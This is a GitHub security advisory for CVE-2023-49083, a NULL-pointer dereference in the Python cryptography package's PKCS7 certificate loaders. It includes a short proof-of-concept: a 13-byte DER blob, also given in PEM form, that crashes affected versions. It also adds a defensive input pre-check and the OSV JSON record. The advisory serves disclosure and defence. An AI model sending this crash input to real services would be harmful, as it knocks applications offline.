GHSA-jfhm-5ghh-2f97
Vulnerability from github
Summary
Calling `load_pem_pkcs7_certificates` or `load_der_pkcs7_certificates` could lead to a NULL-pointer dereference and segfault.
PoC
Here is Python code that triggers the issue:

```python
from cryptography.hazmat.primitives.serialization.pkcs7 import load_der_pkcs7_certificates, load_pem_pkcs7_certificates

# PEM form of the input: the base64 body decodes to the same 13 bytes as der_p7.
pem_p7 = b"""
-----BEGIN PKCS7-----
MAsGCSqGSIb3DQEHAg==
-----END PKCS7-----
"""

# DER form of the input.
der_p7 = b"\x30\x0B\x06\x09\x2A\x86\x48\x86\xF7\x0D\x01\x07\x02"

# On an affected version, the first call already crashes the interpreter with a segfault.
load_pem_pkcs7_certificates(pem_p7)
load_der_pkcs7_certificates(der_p7)
```
Impact
Exploitation of this vulnerability poses a serious risk of Denial of Service (DoS) for any application attempting to deserialize a PKCS7 blob/certificate. The consequences extend to potential disruptions in system availability and stability.
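The DER bytes in the PoC decode to a ContentInfo SEQUENCE that holds only the signedData OID, with the content field absent. As an added example (not part of the advisory or of the cryptography project), here is a stdlib-only pre-check that refuses that shape before the bytes reach the loaders on a version older than the fixed 41.0.6; the function names are hypothetical, and the check covers only this input shape.

```python
import base64
import re

# DER content octets of OID 1.2.840.113549.1.7.2 (signedData), as in the PoC bytes.
SIGNED_DATA_OID = bytes.fromhex("2a864886f70d010702")


def _read_tlv(buf, pos):
    """Return (tag, value, next_pos) for the DER TLV starting at pos."""
    if pos + 2 > len(buf):
        raise ValueError("truncated TLV header")
    tag, first = buf[pos], buf[pos + 1]
    pos += 2
    if first < 0x80:                      # short-form length
        length = first
    else:                                 # long-form length, 1 to 4 octets
        n = first & 0x7F
        if n == 0 or n > 4 or pos + n > len(buf):
            raise ValueError("unsupported or truncated length")
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    if pos + length > len(buf):
        raise ValueError("TLV value runs past end of input")
    return tag, buf[pos:pos + length], pos + length


def has_signed_data_content(der):
    """True only if the ContentInfo carries signedData and a non-empty [0] content."""
    tag, body, _ = _read_tlv(der, 0)
    if tag != 0x30:
        raise ValueError("outer element is not a SEQUENCE")
    tag, oid, pos = _read_tlv(body, 0)
    if tag != 0x06 or oid != SIGNED_DATA_OID:
        raise ValueError("contentType is not signedData")
    if pos == len(body):
        return False                      # content absent: the shape of the PoC input
    tag, content, _ = _read_tlv(body, pos)
    return tag == 0xA0 and len(content) > 0


def pem_to_der(pem):
    """Extract and base64-decode the first PKCS7 PEM block."""
    m = re.search(rb"-----BEGIN PKCS7-----(.*?)-----END PKCS7-----", pem, re.S)
    if m is None:
        raise ValueError("no PKCS7 PEM block found")
    return base64.b64decode(b"".join(m.group(1).split()))
```

Treat a `False` result or a `ValueError` as a rejected input and skip the loader call; this is a stopgap, and the advisory record lists 41.0.6 as the fixed release.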
```json
{
  "affected": [
    {
      "ecosystem_specific": {
        "affected_functions": [
          "cryptography.hazmat.primitives.serialization.pkcs7.load_der_pkcs7_certificates",
          "cryptography.hazmat.primitives.serialization.pkcs7.load_pem_pkcs7_certificates"
        ]
      },
      "package": {
        "ecosystem": "PyPI",
        "name": "cryptography"
      },
      "ranges": [
        {
          "events": [
            { "introduced": "3.1" },
            { "fixed": "41.0.6" }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [ "CVE-2023-49083" ],
  "database_specific": {
    "cwe_ids": [ "CWE-476" ],
    "github_reviewed": true,
    "github_reviewed_at": "2023-11-28T20:46:46Z",
    "nvd_published_at": "2023-11-29T19:15:07Z",
    "severity": "MODERATE"
  },
  "details": "### Summary\n\nCalling `load_pem_pkcs7_certificates` or `load_der_pkcs7_certificates` could lead to a NULL-pointer dereference and segfault.\n\n### PoC\nHere is a Python code that triggers the issue:\n```python\nfrom cryptography.hazmat.primitives.serialization.pkcs7 import load_der_pkcs7_certificates, load_pem_pkcs7_certificates\n\npem_p7 = b\"\"\"\n-----BEGIN PKCS7-----\nMAsGCSqGSIb3DQEHAg==\n-----END PKCS7-----\n\"\"\"\n\nder_p7 = b\"\\x30\\x0B\\x06\\x09\\x2A\\x86\\x48\\x86\\xF7\\x0D\\x01\\x07\\x02\"\n\nload_pem_pkcs7_certificates(pem_p7)\nload_der_pkcs7_certificates(der_p7)\n```\n\n### Impact\nExploitation of this vulnerability poses a serious risk of Denial of Service (DoS) for any application attempting to deserialize a PKCS7 blob/certificate. The consequences extend to potential disruptions in system availability and stability.",
  "id": "GHSA-jfhm-5ghh-2f97",
  "modified": "2024-02-20T18:14:36Z",
  "published": "2023-11-28T20:46:46Z",
  "references": [
    { "type": "WEB", "url": "https://github.com/pyca/cryptography/security/advisories/GHSA-jfhm-5ghh-2f97" },
    { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-49083" },
    { "type": "WEB", "url": "https://github.com/pyca/cryptography/pull/9926" },
    { "type": "WEB", "url": "https://github.com/pyca/cryptography/commit/f09c261ca10a31fe41b1262306db7f8f1da0e48a" },
    { "type": "PACKAGE", "url": "https://github.com/pyca/cryptography" },
    { "type": "WEB", "url": "https://github.com/pypa/advisory-database/tree/main/vulns/cryptography/PYSEC-2023-254.yaml" },
    { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QMNTYMUGFJSDBYBU22FUYBHFRZODRKXV" },
    { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2023/11/29/2" }
  ],
  "schema_version": "1.4.0",
  "severity": [
    { "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", "type": "CVSS_V3" }
  ],
  "summary": "cryptography vulnerable to NULL-dereference when loading PKCS7 certificates"
}
```